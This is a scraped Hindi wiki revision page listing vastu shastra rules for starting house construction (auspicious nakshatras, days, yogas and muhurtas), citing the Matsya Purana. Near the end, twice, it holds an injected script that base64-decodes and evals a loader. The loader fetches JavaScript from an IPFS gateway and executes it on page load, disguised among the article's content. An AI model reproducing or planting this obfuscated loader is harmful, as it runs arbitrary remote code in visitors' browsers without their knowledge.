Difference between revisions of "वास्तुशास्त्र गृहारम्भ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*गृहारम्भ में अश्विनी, [[रोहिणी नक्...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
*गृहारम्भ में [[अश्विनी नक्षत्र|अश्विनी]], [[रोहिणी नक्षत्र|रोहिणी]], [[मूल नक्षत्र|मूल]], तीनों [[उत्तरा]], मृगशिरा, स्वाती, हस्त और अनुराधा- ये नक्षत्र प्रशस्त कहे गये हैं।
 
 
{{main|वास्तु शास्त्र}}
 
{{main|वास्तु शास्त्र}}
 +
*गृहारम्भ में [[अश्विनी नक्षत्र|अश्विनी]], [[रोहिणी नक्षत्र|रोहिणी]], [[मूल नक्षत्र|मूल]], तीनों [[उत्तरा]], [[मृगशिरा नक्षत्र|मृगशिरा]], स्वाती, [[हस्त नक्षत्र|हस्त]] और [[अनुराधा नक्षत्र|अनुराधा]]- ये [[नक्षत्र]] प्रशस्त कहे गये हैं।
 
*[[रविवार]] और [[मंगलवार]] को छोड़कर शेष सभी दिन शुभदायक हैं।  
 
*[[रविवार]] और [[मंगलवार]] को छोड़कर शेष सभी दिन शुभदायक हैं।  
 
*व्याघात, शूल, व्यतीपात; अतिगण्ड, विष्कम्भ, गण्ड, परिघ और वज्र-इन योगों में गृहारम्भ नहीं करना चाहिये।  
 
*व्याघात, शूल, व्यतीपात; अतिगण्ड, विष्कम्भ, गण्ड, परिघ और वज्र-इन योगों में गृहारम्भ नहीं करना चाहिये।  
 
*श्वेत, मैत्र, माहेन्द्र, गान्धव, अभिजित, रौहिण, वैराज और सावित्र- इन मुहूर्तों में गृहारम्भ करना चाहिये।  
 
*श्वेत, मैत्र, माहेन्द्र, गान्धव, अभिजित, रौहिण, वैराज और सावित्र- इन मुहूर्तों में गृहारम्भ करना चाहिये।  
 
*[[चन्द्रमा]] और सूर्य के बल के साथ-ही-साथ शुभ लग्न का भी निरीक्षण करना चाहिये।  
 
*[[चन्द्रमा]] और सूर्य के बल के साथ-ही-साथ शुभ लग्न का भी निरीक्षण करना चाहिये।  
*सर्वप्रथम अन्य कार्यों को छोड़कर स्तम्भरोपण करना चाहिये। यही विधि प्रासाद, कूप एवं बावलियों के लिये भी मानी गयी है। <ref>मत्स्य पुराण॥1-10॥</ref>
+
*सर्वप्रथम अन्य कार्यों को छोड़कर स्तम्भरोपण करना चाहिये।  
 +
*यही विधि प्रासाद, कूप एवं बावलियों के लिये भी मानी गयी है।<ref>[[मत्स्य पुराण]]॥1-10॥</ref>
  
  
Line 12: Line 13:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
  
 
==संबंधित लेख==
 
==संबंधित लेख==
  
[[Category:नया पन्ना सितंबर-2011]]
+
[[Category:कला कोश]]
 +
[[Category:स्थापत्य कला]]
 +
[[Category:पौराणिक कोश]]  
  
 
__INDEX__
 
__INDEX__

Revision as of 15:33, 29 September 2011

  1. REDIRECTsaancha:mukhy
  • griharambh mean ashvini, rohini, mool, tinoan uttara, mrigashira, svati, hast aur anuradha- ye nakshatr prashast kahe gaye haian.
  • ravivar aur mangalavar ko chho dakar shesh sabhi din shubhadayak haian.
  • vyaghat, shool, vyatipat; atigand, vishkambh, gand, parigh aur vajr-in yogoan mean griharambh nahian karana chahiye.
  • shvet, maitr, mahendr, gandhav, abhijit, rauhin, vairaj aur savitr- in muhoortoan mean griharambh karana chahiye.
  • chandrama aur soory ke bal ke sath-hi-sath shubh lagn ka bhi nirikshan karana chahiye.
  • sarvapratham any karyoan ko chho dakar stambharopan karana chahiye.
  • yahi vidhi prasad, koop evan bavaliyoan ke liye bhi mani gayi hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. matsy puran॥1-10॥

sanbandhit lekh